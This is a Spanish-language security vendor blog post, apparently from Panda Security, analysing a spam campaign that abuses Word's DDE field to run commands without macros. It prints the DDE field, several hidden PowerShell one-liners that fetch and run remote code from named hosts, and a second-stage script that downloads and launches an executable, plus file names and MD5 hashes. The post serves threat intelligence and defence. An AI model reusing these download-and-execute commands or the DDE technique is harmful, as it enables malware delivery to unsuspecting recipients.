En las últimas horas hemos detectado una campaña de spam dirigida a empresas haciendo uso de un nuevo exploit zero-day en el protocolo Dynamic Data Exchange (DDE) de Microsoft. Se trata de un ataque muy peligroso, ya que se puede conseguir la ejecución de comando en Word sin necesidad de objetos OLE o macros. Todos nuestros clientes están protegidos de forma proactiva sin necesidad de actualizar gracias a Adaptive Defense 360.
Comportamiento
Llega un correo electrónico con un documento adjunto. Al abrir el documento Word lo primero que vemos es el siguiente mensaje:
Su hacemos click en el botón “Si” se mostrará el siguiente mensaje:
A continuación aparece el siguiente mensaje:
El documento (muestra 0910541C2AC975A49A28D7A939E48CD3) consta de dos páginas, la primera en blanco, la siguiente contiene el siguiente mensaje en ruso:
Si hacemos click con el ratón vemos que el mensaje tiene asociado un código de campo:
Si editamos el campo podemos ver el comando utilizado para explotar la vulnerabilidad y permitir la ejecución de código:
| DDE C:\\Windows\\System32\\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “ |
En la siguiente captura de pantalla podemos ver el árbol de procesos que se genera si se ejecuta correctamente el exploit:
Estos son los nombres de algunos de los ficheros utilizados en esta campaña:
- I_215854.doc
- I_563435.doc
- I_847923.doc
- I_949842.doc
- I_516947.doc
- I_505075.doc
- I_875517.doc
- DC0005845.doc
- DC000034.doc
- DC000873.doc
- I_958223.doc
- I_224600.doc
- I_510287.doc
- I_959819.doc
- I_615989.doc
- I_839063.doc
- I_141519.doc
Comandos a ejecutar
Dependiendo de la muestra analizada, podemos ver que la URL de descarga varía, a pesar de que el comando es básicamente igual.
Muestra 0910541C2AC975A49A28D7A939E48CD3
powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e
Muestra 19CD38411C58F5441969E039204C3007
powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e
Muestra 96284109C58728ED0B7E4A1229825448
powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e
Muestra 1CB9A32AF5B30AA26D6198C8B5C46168
powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e
Lo que se baja y ejecuta es el siguiente script en powershell:
$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”
foreach($url in $urls){
Try
{
Write-Host $url
$fp = “$env:temp\rekakva32.exe”
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}
Desde la URL:
hxxp://shamanic-extracts.biz/eurgf837or
Se descarga un troyano (4F03E360BE488A3811D40C113292BC01).
MD5s de los documentos de Word:
0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168
Panda Security es una empresa especializada en la creación de productos de seguridad para endpoints que son parte del portfolio de soluciones de seguridad IT de WatchGuard. Centrada inicialmente en la creación de software antivirus, la compañía ha ampliado sus objetivos expandiendo su línea de negocio hacia los servicios de ciberseguridad avanzada con tecnologías para la prevención del cibercrimen.
1 comment